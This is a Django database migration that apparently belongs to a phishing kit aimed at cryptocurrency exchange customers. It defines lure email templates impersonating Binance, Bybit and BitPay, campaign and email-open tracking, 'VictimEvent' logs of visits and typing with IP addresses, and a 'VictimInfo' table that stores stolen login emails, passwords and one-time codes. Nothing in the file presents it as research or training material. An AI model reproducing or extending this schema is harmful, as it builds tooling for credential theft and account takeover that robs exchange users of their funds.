# Generated by Django 4.2 on 2025-06-26 18:30

from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import shortuuid.django_fields


class Migration(migrations.Migration):

    initial = True

    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
    ]

    operations = [
        migrations.CreateModel(
            name='Campaign',
            fields=[
                ('id', shortuuid.django_fields.ShortUUIDField(alphabet='0123456789abcdefghijklmnopqrstuvwxyz', length=10, max_length=10, prefix='', primary_key=True, serialize=False)),
                ('recipient_email', models.EmailField(max_length=254)),
                ('created_at', models.DateTimeField(auto_now_add=True)),
            ],
            options={
                'verbose_name': 'Campaign',
                'verbose_name_plural': 'Campaigns',
                'ordering': ['-created_at'],
            },
        ),
        migrations.CreateModel(
            name='EmailEvent',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('event_type', models.CharField(choices=[('open', 'Open'), ('delivered', 'Delivered'), ('bounced', 'Bounced')], max_length=16)),
                ('timestamp', models.DateTimeField(auto_now_add=True)),
                ('recipient', models.EmailField(max_length=254)),
                ('tracking_id', models.CharField(max_length=64, unique=True)),
            ],
            options={
                'verbose_name': 'Email Event',
                'verbose_name_plural': 'Email Events',
                'ordering': ['-timestamp'],
            },
        ),
        migrations.CreateModel(
            name='EmailTemplate',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('type', models.CharField(choices=[('binance_deposit', 'Binance Deposit on Hold'), ('binance_unknown', 'Binance Unknown Login'), ('bybit_deposit', 'Bybit Deposit on Hold'), ('bybit_unknown', 'Bybit Unknown Login'), ('bitpay_deposit', 'BitPay Deposit on Hold'), ('bitpay_unknown', 'BitPay Unknown Login')], max_length=20)),
            ],
            options={
                'verbose_name': 'Email Template',
                'verbose_name_plural': 'Email Templates',
            },
        ),
        migrations.CreateModel(
            name='VictimEvent',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('campaign', models.CharField(max_length=10)),
                ('event_type', models.CharField(choices=[('visit', 'Visit'), ('typing', 'Typing')], max_length=16)),
                ('timestamp', models.DateTimeField(auto_now_add=True)),
                ('ip_address', models.GenericIPAddressField(blank=True, null=True)),
                ('user_agent', models.TextField(blank=True, null=True)),
            ],
            options={
                'verbose_name': 'Victim Event',
                'verbose_name_plural': 'Victim Events',
                'ordering': ['-timestamp'],
            },
        ),
        migrations.CreateModel(
            name='VictimInfo',
            fields=[
                ('id', shortuuid.django_fields.ShortUUIDField(alphabet='0123456789abcdefghijklmnopqrstuvwxyz', length=10, max_length=10, prefix='', primary_key=True, serialize=False)),
                ('campaign', models.CharField(max_length=10)),
                ('login_email', models.EmailField(max_length=254)),
                ('login_password', models.CharField(blank=True, max_length=255, null=True)),
                ('login_otp', models.CharField(blank=True, max_length=6, null=True)),
                ('created_at', models.DateTimeField(auto_now_add=True)),
                ('updated_at', models.DateTimeField(auto_now=True)),
                ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='victim_infos', to=settings.AUTH_USER_MODEL)),
            ],
            options={
                'verbose_name': 'Victim Info',
                'verbose_name_plural': 'Victim Infos',
                'ordering': ['-created_at'],
            },
        ),
        migrations.AddIndex(
            model_name='victimevent',
            index=models.Index(fields=['campaign', 'event_type'], name='core_victim_campaig_ea64ed_idx'),
        ),
        migrations.AddField(
            model_name='emailevent',
            name='campaign',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='email_events', to='core.campaign'),
        ),
        migrations.AddField(
            model_name='campaign',
            name='email_template',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='campaigns', to='core.emailtemplate'),
        ),
        migrations.AddField(
            model_name='campaign',
            name='user',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='campaigns', to=settings.AUTH_USER_MODEL),
        ),
        migrations.AddIndex(
            model_name='emailevent',
            index=models.Index(fields=['campaign', 'event_type', 'recipient'], name='core_emaile_campaig_c930c1_idx'),
        ),
    ]
